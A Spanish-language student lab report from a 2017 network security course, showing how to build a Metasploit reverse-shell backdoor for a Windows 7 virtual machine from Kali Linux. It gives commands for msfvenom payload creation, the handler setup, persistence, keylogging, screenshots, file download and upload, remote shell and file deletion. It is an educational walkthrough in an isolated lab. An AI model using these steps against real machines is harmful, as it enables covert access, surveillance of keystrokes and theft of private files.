You are on page 1of 20

BACKDOOR, EXPLOTACIN Y POST-EXPLOTACIN

BOLKAR LEIMAR OCAMPO MONTOYA


D.I. 1.193.125.198
SBADOS DE 9:00 A 10:30

SEGURIDAD EN REDES

HORACIO RODRIGUEZ SOTO


DOCENTE

CESDE
MEDELLN
2017
Para hacer un backdoor o puerta trasera se usa una herramienta llamada Metasploit, conocida por su
capacidad de crear diversos exploits funcionales.

Para esta prueba vamos a usar dos mquinas virtuales, Una Kali Linux y una Windows 7. Para poder
hacer la prueba necesitamos que entre las dos mquinas se puedan dar ping. La Kali Linux necesita dos
tarjetas, una ya sea en bridge, puente o NAT para descargar archivos en caso de que sea necesario y la
otra en red interna para tener comunicacin con el cliente Windows 7, este slo necesita una tarjeta en
red interna para tener comunicacin con la Kali Linux. Empecemos a configurar primero la Windows 7.
Para ponerle la IP que queremos a la Windows 7 se da clic derecho sobre el panel de red y se selecciona
abrir centro de redes y recursos compartidos.

Se da clic sobre conexin de rea local y se presiona donde dice propiedades

Se selecciona donde dice Protocolo de internet versin 4 y se da clic sobre propiedades.


Se selecciona donde dice Usar la siguiente direccin IP y se pone una IP que deseemos con su respectiva
mascara en mi caso us una IP tipo C y su respectiva mscara 24. Ojo, la IP que pongamos debe estar en
el mismo rango que le pondremos a la Kali Linux.

Cabe mencionar que hay que desactivar el firewall de Windows para asegurar el buen trabajo del
Backdoor, para esto vamos a panel de control.
Una vez aqu presionamos donde dice ver por y ponemos iconos grandes y seleccionamos donde dice
Firewall de Windows.

Una vez aqu vamos a Activar o desactivar Firewall de Windows.


Cuando le demos clic activamos las opciones de Desactivar Firewall de Windows y luego aceptar.

Ahora lo siguiente es ponerle direccin IP a la Kali Linux, para esto debemos abrir una terminal, le
podemos dar clic sobre este icono que se encuentra al lado izquierdo de la Kali Linux. O simplemente en
el buscador se pone Terminal.
Saldr algo as:

Una vez tengamos abierta la Terminal, se escribe el comando nano /etc/network/interfaces Y se


presiona Enter. Saldr algo as:

Lo que tenemos que hacer es decirle que la Eth0 que es la tarjeta Bridge ser automtica, o sea que el
DHCP del computador o del Router le dar la IP para as salir a internet, Tambin hay que decirle que la
Eth1 que es la tarjeta en red interna, ser estatica y tendr cierta direccin IP y cierta mscara, no hay
necesidad de poner Gateway o puerta de enlace, ni broadcast ni tampoco servidor DNS, ya que no se
necesita salir a internet. Para poner la direccin IP se pondr addres #IP siendo #IP la IP que se desee
y netmask #Mascara siendo #Mscara la mscara que se desee usar. Tiene que quedar as:
Luego presionamos Control + X, luego S y terminamos con Enter. Ahora hay que poner el comando
para reiniciar las tarjetas, para as poder cargar la configuracin que deseamos, para esto se introduce
/etc/init.d/networking restart y todo debe salir en OK. Luego presionamos ifconfig para revisar que si
se tenga las IP que se puso.
Una vez miremos que s se tenga la IP deseada hay que verificar que s se de Ping con la Windows y
viceversa. Para esto se introduce ping #IP Windows7, en mi caso ping 192.168.10.2 y desde la Windows
a la Kali Linux ping 192.168.10.1.
Kali Linux

Windows 7

Una vez verifiquemos que se den ping procederemos a escanear la Windows 7 para verificar puertos
vulnerables los cuales podamos usar para acceder a la mquina, para esto usaremos un comando muy
poderoso el cual es nmap, entonces introducimos nmap sV #IP Windows7, en mi caso este comando
sera nmap sV 192.168.10.2.
Se pueden ver los puertos abiertos que tiene la mquina, se puede usar cualquiera de estos para tener
acceso a la Windows 7, en este caso se usar el puerto 445. Una vez tengamos el puerto pasaremos a
crear el Exploit. Para crear el Exploit se usar una herramienta de Metasploit, conocida como Msfvenom.
Entonces se introduce en la terminal msfvenom p windows/meterpreter/reverse_tcp
LHOST=192.168.10.1 LPORT=445 f exe o Shell.exe, siendo LHOST la direccin IP de la Kali
Linux, LPORT el puerto por el cual queremos entrar en este caso 445 y Shell.exe el nombre que deseamos
que tenga el archivo .exe que ser capaz de crear el crear el Backdoor.

Una vez creado el archivo lo que queda es pasarlo a la Windows 7 y ejecutarlo, para pasarlo se puede
usar una memoria USB o se puede subir el archivo al Google Drive y se descarga en la windows (En
caso de que se haya puesto la windows en modo bridge o tenga otra tarjeta en este modo). Para encontrar
el archivo simplemente presionamos aqu:

Y ah estar el archivo.
Una vez el archivo est en la mquina Windows 7, se seguir trabajando en la Kali Linux.

Una vez en la Kali Linux se abrir el programa de Metasploit, hay dos formas, dando clic sobre el icono
del programa o escribiendo en la terminal msfconsole.

Una vez abierto el programa debe salir una interfaz as:

Una vez abierta la terminar hay escribir lo siguiente: (Ojo cada uno es un comando diferente)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.10.1
set lport 445
Siendo lhost la IP de la Kali Linux y lport el puerto por el cual queremos entrar.
Ahora hay que ejecutarlo, para esto introducimos exploit. Y saldr algo as:

An no estamos en la Windows, todava nos falta ejecutar el archivo Shell.exe que se haba pasado
anteriormente a la Windows.

Una vez lo ejecutemos la explotacin estar lista y pasaremos a la fase de Post-Explotacin.

Aqu empezaremos a introducir comandos maliciosos, o tambin conocidos como comandos Kung-Fu.
Para empezar, vamos a comenzar con un comando crucial, que es crear el Backdoor Persistence. Para
qu esto? Pues es sencillo, cada vez que se apague la mquina Windows 7 se tendra que volver a ejecutar
el archivo Shell.exe para tener acceso a ella, mientras que s creamos un Backdoor Persistence seremos
capaces de entrar a la Windows 7 cada que queramos sin necesidad de volver a ejecutar el archivo.
Comprobemos qu pasa si hacemos reiniciar la Windows 7 con el comando reboot y veremos como la
sesin del Backdoor se cierra y no se volver a abrir hasta que se vuelva a ejecutar Shell.exe.
Miremos como se cerr la sesin y aunque la Windows 7 ya volvi a iniciar, la sesin del Backdoor sigue
muerta, hasta que se vuelva a presionar sobre el Shell.exe que se encuentra en la Windows.
Volvemos a introducir el comando exploit y este no entrara de nuevo hasta ejecutar Shell.exe en la
Windows 7.

Una vez ejecutado Shell.exe volvemos a estar adentro.

Entonces, para evitar esto vamos a introducir el comando run persistence U p 445 r 192.168.10.1
poniendo la IP de la Kali Linux. Si todo sale bien debe salir as:

Entonces volvamos a introducir el comando reboot, veremos que la sesin morir, obviamente debido a
que el computador se estar apagando y volviendo a iniciar y con un computador apagado no se puede
manipular nada, pero s volvemos a introducir el comando exploit este se podr iniciar sin necesidad de
ejecutar el archivo Shell.exe de la Windows 7.
Y listo, ya tenemos nuestro Backdoor Persistente. El cual podremos activar siempre que queramos, pero
la mquina Windows 7 debe estar encendida para que esto funcione. Una vez la sesin creada podremos
hacer muchos ms comandos de Post-Explotacin, otro comando bsico que se puede usar es el comando
screenshot, que bsicamente lo que hace es capturar un pantallazo de lo que est haciendo la windows
7 en ese momento.

Y si vamos a la windows 7 efectivamente est en el escritorio sin hacer nada (debidamente a que no la
estamos usando en estos momentos).
Otro comando muy bueno que se puede usar es el keyscan, bsicamente lo que hace este comando es
capturar lo que ha escrito la Windows, entonces se introduce keyscan_start para iniciarlo,
keyscan_dump para mostrar lo que se ha escrito y keyscan_stop para terminar el Keylogger.

Se puede ver lo que se escribi en la Windows 7 desde el momento en que se inici el Keylogger, los
<back> significa que se ha presionado la tecla de borrar o Backspace.
La desventaja de este Keylogger es que no guarda una evidencia, entonces tocara sacar pantallazos en
caso de que la queramos, para esto hay otro tipo de Keylogger, el cual guarda la evidencia en un archivo
.txt en la Kali Linux. Para correrlo se escribe run post/windows/capture/keylog_recorder. Nos
mostrar que se ha activado el Keylogger y la ruta donde ser guardado el archivo.

Entonces abrimos otra terminal y vamos hacia la ruta con el comando cd /root/.msf4/loot y ah
encontraremos el archivo, podremos verlo con el comando cat nombre del archivo.

Para terminar la captura del Keylogger simplemente presionamos Control + C. Otro comando muy
interesante que podemos usar es el download, que nos permitir bajar archivos de la Windows 7 y se
guardarn en la carpeta /root. Cabe mencionar que podremos movernos a travs de los directorios de la
Windows 7 con el comando cd como si estuviramos en un Linux. Por ejemplo, he guardado el archivo
de bloc de notas que se ha estado usando para demostrar el Keylogger, lo he guardado en el escritorio.

Entonces, se tiene que entrar al escritorio desde la Kali Linux, hay que escribir cd ruta del escritorio,
tambin podremos ver en qu directorio de la windows estamos con el comando pwd. Tambin podemos
ver los archivos y los directorios con el comando ls.
Como se puede ver, un comando muy peligroso por si se desea descargar archivos privados de la
mquina. Otro comando que es muy parecido a este es el upload, slo que en lugar de descargar archivos
lo que hace es subirlos. Se subir el archivo que guard el Keylogger al escritorio de la Windows.
Entonces ser algo como upload ruta del archivo.
Y si vamos a ver el escritorio de la Windows 7.

Efectivamente se ha subido el archivo que desebamos y se muestra lo que ha aparecido anteriormente


en el Keylogger. Un comando muy peligroso por s deseamos subir algn tipo de programa malicioso.
Otro comando que no podra faltar es el comando Shell para entrar al modo cmd de la Windows 7, cabe
mencionar que ya para esto se tiene que conocer comandos de Windows 7.
Se puede ver que se introdujo el comando Shell para entrar al modo cmd de la Windows 7 desde la Kali
Linux y se us un comando del Windows 7 para comprobar los archivos que hay, el cual es dir.
Aqu hay otros comandos de la Windows 7, tales como type que nos permite visualizar el contenido de
documentos y archivos .txt sin necesidad de abrirlos, tambin se muestra el comando del que sirve para
borrar archivos, se ha borrado el archivo PRUEBITA.txt y si vamos a ver la Windows 7, el archivo ha
desaparecido.

Si se desea Salir de la terminal cmd de la windows simplemente presionamos Control + C. Y para cerrar,
existen otros dos comandos bsicos que se pueden usar, los cuales son reboot que ya lo habamos visto
anteriormente, que sirve para reiniciar la mquina y el comando shutdown que nos sirve para apagarla.
Se pudo demostrar cmo hacer un Backdoor, y an mejor un Backdoor Persistente, Explotacin y varios
comandos de Post-Explotacin.

You might also like